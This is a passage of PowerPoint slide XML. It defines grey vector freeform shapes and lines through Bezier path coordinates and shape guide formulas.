                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="422" y="1644"/>
                          <a:pt x="422" y="1644"/>
                          <a:pt x="422" y="1644"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="309" y="1675"/>
                          <a:pt x="309" y="1675"/>
                          <a:pt x="309" y="1675"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="1708"/>
                          <a:pt x="162" y="1765"/>
                          <a:pt x="102" y="1843"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="50" y="1913"/>
                          <a:pt x="16" y="1988"/>
                          <a:pt x="0" y="2061"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="2223"/>
                          <a:pt x="0" y="2223"/>
                          <a:pt x="0" y="2223"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="13" y="2272"/>
                          <a:pt x="38" y="2314"/>
                          <a:pt x="76" y="2343"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="116" y="2373"/>
                          <a:pt x="166" y="2386"/>
                          <a:pt x="219" y="2384"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="356" y="2347"/>
                          <a:pt x="356" y="2347"/>
                          <a:pt x="356" y="2347"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6326" y="745"/>
                          <a:pt x="6326" y="745"/>
                          <a:pt x="6326" y="745"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6463" y="709"/>
                          <a:pt x="6463" y="709"/>
                          <a:pt x="6463" y="709"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6533" y="675"/>
                          <a:pt x="6602" y="619"/>
                          <a:pt x="6658" y="545"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6708" y="480"/>
                          <a:pt x="6741" y="409"/>
                          <a:pt x="6758" y="340"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6758" y="156"/>
                          <a:pt x="6758" y="156"/>
                          <a:pt x="6758" y="156"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6745" y="111"/>
                          <a:pt x="6720" y="73"/>
                          <a:pt x="6684" y="46"/>
                        </a:cubicBez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Freeform 514"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="4234" y="2334"/>
                    <a:ext cx="117" cy="125"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 551 w 701"/>
                      <a:gd name="T1" fmla="*/ 545 h 747"/>
                      <a:gd name="T2" fmla="*/ 577 w 701"/>
                      <a:gd name="T3" fmla="*/ 45 h 747"/>
                      <a:gd name="T4" fmla="*/ 422 w 701"/>
                      <a:gd name="T5" fmla="*/ 5 h 747"/>
                      <a:gd name="T6" fmla="*/ 309 w 701"/>
                      <a:gd name="T7" fmla="*/ 36 h 747"/>
                      <a:gd name="T8" fmla="*/ 102 w 701"/>
                      <a:gd name="T9" fmla="*/ 204 h 747"/>
                      <a:gd name="T10" fmla="*/ 0 w 701"/>
                      <a:gd name="T11" fmla="*/ 422 h 747"/>
                      <a:gd name="T12" fmla="*/ 0 w 701"/>
                      <a:gd name="T13" fmla="*/ 584 h 747"/>
                      <a:gd name="T14" fmla="*/ 76 w 701"/>
                      <a:gd name="T15" fmla="*/ 704 h 747"/>
                      <a:gd name="T16" fmla="*/ 219 w 701"/>
                      <a:gd name="T17" fmla="*/ 745 h 747"/>
                      <a:gd name="T18" fmla="*/ 356 w 701"/>
                      <a:gd name="T19" fmla="*/ 708 h 747"/>
                      <a:gd name="T20" fmla="*/ 551 w 701"/>
                      <a:gd name="T21" fmla="*/ 545 h 7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701" h="747">
                        <a:moveTo>
                          <a:pt x="551" y="545"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="689" y="363"/>
                          <a:pt x="701" y="139"/>
                          <a:pt x="577" y="45"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="534" y="12"/>
                          <a:pt x="480" y="0"/>
                          <a:pt x="422" y="5"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="309" y="36"/>
                          <a:pt x="309" y="36"/>
                          <a:pt x="309" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="69"/>
                          <a:pt x="162" y="126"/>
                          <a:pt x="102" y="204"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="50" y="274"/>
                          <a:pt x="16" y="349"/>
                          <a:pt x="0" y="422"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="584"/>
                          <a:pt x="0" y="584"/>
                          <a:pt x="0" y="584"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="13" y="633"/>
                          <a:pt x="38" y="675"/>
                          <a:pt x="76" y="704"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="116" y="734"/>
                          <a:pt x="166" y="747"/>
                          <a:pt x="219" y="745"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="356" y="708"/>
                          <a:pt x="356" y="708"/>
                          <a:pt x="356" y="708"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="426" y="675"/>
                          <a:pt x="495" y="619"/>
                          <a:pt x="551" y="545"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="4D4D4D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Freeform 515"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="5245" y="2060"/>
                    <a:ext cx="117" cy="125"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 150 w 698"/>
                      <a:gd name="T1" fmla="*/ 205 h 748"/>
                      <a:gd name="T2" fmla="*/ 124 w 698"/>
                      <a:gd name="T3" fmla="*/ 704 h 748"/>
                      <a:gd name="T4" fmla="*/ 266 w 698"/>
                      <a:gd name="T5" fmla="*/ 745 h 748"/>
                      <a:gd name="T6" fmla="*/ 403 w 698"/>
                      <a:gd name="T7" fmla="*/ 709 h 748"/>
                      <a:gd name="T8" fmla="*/ 598 w 698"/>
                      <a:gd name="T9" fmla="*/ 545 h 748"/>
                      <a:gd name="T10" fmla="*/ 698 w 698"/>
                      <a:gd name="T11" fmla="*/ 340 h 748"/>
                      <a:gd name="T12" fmla="*/ 698 w 698"/>
                      <a:gd name="T13" fmla="*/ 156 h 748"/>
                      <a:gd name="T14" fmla="*/ 624 w 698"/>
                      <a:gd name="T15" fmla="*/ 46 h 748"/>
                      <a:gd name="T16" fmla="*/ 469 w 698"/>
                      <a:gd name="T17" fmla="*/ 5 h 748"/>
                      <a:gd name="T18" fmla="*/ 356 w 698"/>
                      <a:gd name="T19" fmla="*/ 36 h 748"/>
                      <a:gd name="T20" fmla="*/ 150 w 698"/>
                      <a:gd name="T21" fmla="*/ 205 h 7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98" h="748">
                        <a:moveTo>
                          <a:pt x="150" y="205"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="386"/>
                          <a:pt x="0" y="610"/>
                          <a:pt x="124" y="704"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="164" y="735"/>
                          <a:pt x="213" y="748"/>
                          <a:pt x="266" y="745"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="403" y="709"/>
                          <a:pt x="403" y="709"/>
                          <a:pt x="403" y="709"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="473" y="675"/>
                          <a:pt x="542" y="619"/>
                          <a:pt x="598" y="545"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="648" y="480"/>
                          <a:pt x="681" y="409"/>
                          <a:pt x="698" y="340"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="698" y="156"/>
                          <a:pt x="698" y="156"/>
                          <a:pt x="698" y="156"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="685" y="111"/>
                          <a:pt x="660" y="73"/>
                          <a:pt x="624" y="46"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="581" y="13"/>
                          <a:pt x="527" y="0"/>
                          <a:pt x="469" y="5"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="356" y="36"/>
                          <a:pt x="356" y="36"/>
                          <a:pt x="356" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="282" y="69"/>
                          <a:pt x="209" y="126"/>
                          <a:pt x="150" y="205"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="4D4D4D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3" name="Freeform 516"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="4796" y="2173"/>
                    <a:ext cx="125" cy="141"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 124 w 748"/>
                      <a:gd name="T1" fmla="*/ 752 h 847"/>
                      <a:gd name="T2" fmla="*/ 598 w 748"/>
                      <a:gd name="T3" fmla="*/ 593 h 847"/>
                      <a:gd name="T4" fmla="*/ 624 w 748"/>
                      <a:gd name="T5" fmla="*/ 94 h 847"/>
                      <a:gd name="T6" fmla="*/ 150 w 748"/>
                      <a:gd name="T7" fmla="*/ 253 h 847"/>
                      <a:gd name="T8" fmla="*/ 124 w 748"/>
                      <a:gd name="T9" fmla="*/ 752 h 8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48" h="847">
                        <a:moveTo>
                          <a:pt x="124" y="752"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="247" y="847"/>
                          <a:pt x="460" y="775"/>
                          <a:pt x="598" y="593"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="736" y="411"/>
                          <a:pt x="748" y="188"/>
                          <a:pt x="624" y="94"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="500" y="0"/>
                          <a:pt x="288" y="71"/>
                          <a:pt x="150" y="253"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="11" y="435"/>
                          <a:pt x="0" y="658"/>
                          <a:pt x="124" y="752"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="4D4D4D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4" name="Freeform 517"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3922" y="1964"/>
                    <a:ext cx="1402" cy="376"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 19842"/>
                      <a:gd name="T1" fmla="*/ 3943 h 5325"/>
                      <a:gd name="T2" fmla="*/ 14695 w 19842"/>
                      <a:gd name="T3" fmla="*/ 0 h 5325"/>
                      <a:gd name="T4" fmla="*/ 19842 w 19842"/>
                      <a:gd name="T5" fmla="*/ 1380 h 5325"/>
                      <a:gd name="T6" fmla="*/ 5149 w 19842"/>
                      <a:gd name="T7" fmla="*/ 5325 h 5325"/>
                      <a:gd name="T8" fmla="*/ 0 w 19842"/>
                      <a:gd name="T9" fmla="*/ 3943 h 53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842" h="5325">
                        <a:moveTo>
                          <a:pt x="0" y="3943"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="14695" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="19842" y="1380"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="5149" y="5325"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="3943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5" name="Freeform 518"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3870" y="2243"/>
                    <a:ext cx="415" cy="210"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 309 w 2489"/>
                      <a:gd name="T1" fmla="*/ 0 h 1258"/>
                      <a:gd name="T2" fmla="*/ 309 w 2489"/>
                      <a:gd name="T3" fmla="*/ 0 h 1258"/>
                      <a:gd name="T4" fmla="*/ 103 w 2489"/>
                      <a:gd name="T5" fmla="*/ 168 h 1258"/>
                      <a:gd name="T6" fmla="*/ 0 w 2489"/>
                      <a:gd name="T7" fmla="*/ 386 h 1258"/>
                      <a:gd name="T8" fmla="*/ 0 w 2489"/>
                      <a:gd name="T9" fmla="*/ 548 h 1258"/>
                      <a:gd name="T10" fmla="*/ 77 w 2489"/>
                      <a:gd name="T11" fmla="*/ 668 h 1258"/>
                      <a:gd name="T12" fmla="*/ 219 w 2489"/>
                      <a:gd name="T13" fmla="*/ 709 h 1258"/>
                      <a:gd name="T14" fmla="*/ 2265 w 2489"/>
                      <a:gd name="T15" fmla="*/ 1258 h 1258"/>
                      <a:gd name="T16" fmla="*/ 2256 w 2489"/>
                      <a:gd name="T17" fmla="*/ 1253 h 1258"/>
                      <a:gd name="T18" fmla="*/ 2180 w 2489"/>
                      <a:gd name="T19" fmla="*/ 1133 h 1258"/>
                      <a:gd name="T20" fmla="*/ 2180 w 2489"/>
                      <a:gd name="T21" fmla="*/ 971 h 1258"/>
                      <a:gd name="T22" fmla="*/ 2282 w 2489"/>
                      <a:gd name="T23" fmla="*/ 753 h 1258"/>
                      <a:gd name="T24" fmla="*/ 2489 w 2489"/>
                      <a:gd name="T25" fmla="*/ 585 h 1258"/>
                      <a:gd name="T26" fmla="*/ 309 w 2489"/>
                      <a:gd name="T27" fmla="*/ 0 h 12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2489" h="1258">
                        <a:moveTo>
                          <a:pt x="309" y="0"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="309" y="0"/>
                          <a:pt x="309" y="0"/>
                          <a:pt x="309" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="33"/>
                          <a:pt x="162" y="90"/>
                          <a:pt x="103" y="168"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="50" y="238"/>
                          <a:pt x="16" y="313"/>
                          <a:pt x="0" y="386"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="548"/>
                          <a:pt x="0" y="548"/>
                          <a:pt x="0" y="548"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="13" y="597"/>
                          <a:pt x="38" y="639"/>
                          <a:pt x="77" y="668"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="117" y="699"/>
                          <a:pt x="166" y="712"/>
                          <a:pt x="219" y="709"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2265" y="1258"/>
                          <a:pt x="2265" y="1258"/>
                          <a:pt x="2265" y="1258"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2262" y="1256"/>
                          <a:pt x="2259" y="1255"/>
                          <a:pt x="2256" y="1253"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2218" y="1224"/>
                          <a:pt x="2193" y="1182"/>
                          <a:pt x="2180" y="1133"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2180" y="971"/>
                          <a:pt x="2180" y="971"/>
                          <a:pt x="2180" y="971"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2196" y="898"/>
                          <a:pt x="2230" y="823"/>
                          <a:pt x="2282" y="753"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2342" y="675"/>
                          <a:pt x="2415" y="618"/>
                          <a:pt x="2489" y="585"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="309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6" name="Line 519"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1" flipV="1">
                    <a:off x="4613" y="2057"/>
                    <a:ext cx="364" cy="97"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="6350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" name="Line 520"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1" flipV="1">
                    <a:off x="4268" y="2150"/>
                    <a:ext cx="363" cy="97"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="6350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" name="Line 521"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1" flipV="1">
                    <a:off x="4786" y="2010"/>
                    <a:ext cx="364" cy="98"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="6350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9" name="Line 522"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1" flipV="1">
                    <a:off x="4441" y="2103"/>
                    <a:ext cx="363" cy="98"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="6350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0" name="Line 523"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1" flipV="1">
                    <a:off x="4095" y="2196"/>
                    <a:ext cx="363" cy="98"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="6350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56" name="Group 524"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1067" y="1994"/>
                  <a:ext cx="852" cy="901"/>
                  <a:chOff x="1207" y="2242"/>
                  <a:chExt cx="859" cy="908"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="284" name="Freeform 525"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1210" y="2242"/>
                    <a:ext cx="247" cy="96"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 231 w 231"/>
                      <a:gd name="T1" fmla="*/ 65 h 90"/>
                      <a:gd name="T2" fmla="*/ 223 w 231"/>
                      <a:gd name="T3" fmla="*/ 53 h 90"/>
                      <a:gd name="T4" fmla="*/ 211 w 231"/>
                      <a:gd name="T5" fmla="*/ 48 h 90"/>
                      <a:gd name="T6" fmla="*/ 45 w 231"/>
                      <a:gd name="T7" fmla="*/ 3 h 90"/>
                      <a:gd name="T8" fmla="*/ 29 w 231"/>
                      <a:gd name="T9" fmla="*/ 1 h 90"/>
                      <a:gd name="T10" fmla="*/ 18 w 231"/>
                      <a:gd name="T11" fmla="*/ 4 h 90"/>
                      <a:gd name="T12" fmla="*/ 6 w 231"/>
                      <a:gd name="T13" fmla="*/ 18 h 90"/>
                      <a:gd name="T14" fmla="*/ 0 w 231"/>
                      <a:gd name="T15" fmla="*/ 26 h 90"/>
                      <a:gd name="T16" fmla="*/ 226 w 231"/>
                      <a:gd name="T17" fmla="*/ 88 h 90"/>
                      <a:gd name="T18" fmla="*/ 226 w 231"/>
                      <a:gd name="T19" fmla="*/ 88 h 90"/>
                      <a:gd name="T20" fmla="*/ 226 w 231"/>
                      <a:gd name="T21" fmla="*/ 87 h 90"/>
                      <a:gd name="T22" fmla="*/ 230 w 231"/>
                      <a:gd name="T23" fmla="*/ 77 h 90"/>
                      <a:gd name="T24" fmla="*/ 231 w 231"/>
                      <a:gd name="T25" fmla="*/ 65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231" h="90">
                        <a:moveTo>
                          <a:pt x="231" y="65"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="230" y="63"/>
                          <a:pt x="228" y="56"/>
                          <a:pt x="223" y="53"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="219" y="50"/>
                          <a:pt x="211" y="48"/>
                          <a:pt x="211" y="48"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="3"/>
                          <a:pt x="45" y="3"/>
                          <a:pt x="45" y="3"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="40" y="1"/>
                          <a:pt x="34" y="0"/>
                          <a:pt x="29" y="1"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="23" y="2"/>
                          <a:pt x="20" y="3"/>
                          <a:pt x="18" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="5"/>
                          <a:pt x="11" y="11"/>
                          <a:pt x="6" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="21"/>
                          <a:pt x="0" y="26"/>
                          <a:pt x="0" y="26"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="26"/>
                          <a:pt x="225" y="90"/>
                          <a:pt x="226" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="226" y="88"/>
                          <a:pt x="226" y="88"/>
                          <a:pt x="226" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="226" y="87"/>
                          <a:pt x="226" y="87"/>
                          <a:pt x="226" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="228" y="84"/>
                          <a:pt x="229" y="80"/>
                          <a:pt x="230" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="230" y="77"/>
                          <a:pt x="231" y="68"/>
                          <a:pt x="231" y="65"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="4D4D4D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Freeform 526"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1392" y="2433"/>
                    <a:ext cx="259" cy="140"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 151 w 572"/>
                      <a:gd name="T1" fmla="*/ 0 h 309"/>
                      <a:gd name="T2" fmla="*/ 0 w 572"/>
                      <a:gd name="T3" fmla="*/ 196 h 309"/>
                      <a:gd name="T4" fmla="*/ 420 w 572"/>
                      <a:gd name="T5" fmla="*/ 309 h 309"/>
                      <a:gd name="T6" fmla="*/ 572 w 572"/>
                      <a:gd name="T7" fmla="*/ 113 h 309"/>
                      <a:gd name="T8" fmla="*/ 151 w 572"/>
                      <a:gd name="T9" fmla="*/ 0 h 3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2" h="309">
                        <a:moveTo>
                          <a:pt x="151" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="196"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="420" y="309"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="572" y="113"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="151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Freeform 527"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1734" y="2878"/>
                    <a:ext cx="260" cy="140"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 572"/>
                      <a:gd name="T1" fmla="*/ 198 h 309"/>
                      <a:gd name="T2" fmla="*/ 423 w 572"/>
                      <a:gd name="T3" fmla="*/ 309 h 309"/>
                      <a:gd name="T4" fmla="*/ 572 w 572"/>
                      <a:gd name="T5" fmla="*/ 113 h 309"/>
                      <a:gd name="T6" fmla="*/ 151 w 572"/>
                      <a:gd name="T7" fmla="*/ 0 h 309"/>
                      <a:gd name="T8" fmla="*/ 0 w 572"/>
                      <a:gd name="T9" fmla="*/ 198 h 3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2" h="309">
                        <a:moveTo>
                          <a:pt x="0" y="198"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="423" y="309"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="572" y="113"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="151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7" name="Freeform 528"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1598" y="2701"/>
                    <a:ext cx="258" cy="140"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 571"/>
                      <a:gd name="T1" fmla="*/ 196 h 309"/>
                      <a:gd name="T2" fmla="*/ 420 w 571"/>
                      <a:gd name="T3" fmla="*/ 309 h 309"/>
                      <a:gd name="T4" fmla="*/ 571 w 571"/>
                      <a:gd name="T5" fmla="*/ 113 h 309"/>
                      <a:gd name="T6" fmla="*/ 151 w 571"/>
                      <a:gd name="T7" fmla="*/ 0 h 309"/>
                      <a:gd name="T8" fmla="*/ 0 w 571"/>
                      <a:gd name="T9" fmla="*/ 196 h 3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1" h="309">
                        <a:moveTo>
                          <a:pt x="0" y="196"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="420" y="309"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="571" y="113"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="151" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="196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Freeform 529"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1802" y="2968"/>
                    <a:ext cx="260" cy="140"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 574"/>
                      <a:gd name="T1" fmla="*/ 196 h 310"/>
                      <a:gd name="T2" fmla="*/ 423 w 574"/>
                      <a:gd name="T3" fmla="*/ 310 h 310"/>
                      <a:gd name="T4" fmla="*/ 574 w 574"/>
                      <a:gd name="T5" fmla="*/ 111 h 310"/>
                      <a:gd name="T6" fmla="*/ 151 w 574"/>
                      <a:gd name="T7" fmla="*/ 0 h 310"/>
                      <a:gd name="T8" fmla="*/ 0 w 574"/>
                      <a:gd name="T9" fmla="*/ 196 h 3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4" h="310">
                        <a:moveTo>
                          <a:pt x="0" y="196"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="423" y="310"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="574" y="111"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="151" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="196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Freeform 530"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1666" y="2790"/>
                    <a:ext cx="259" cy="140"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 572"/>
                      <a:gd name="T1" fmla="*/ 196 h 309"/>
                      <a:gd name="T2" fmla="*/ 421 w 572"/>
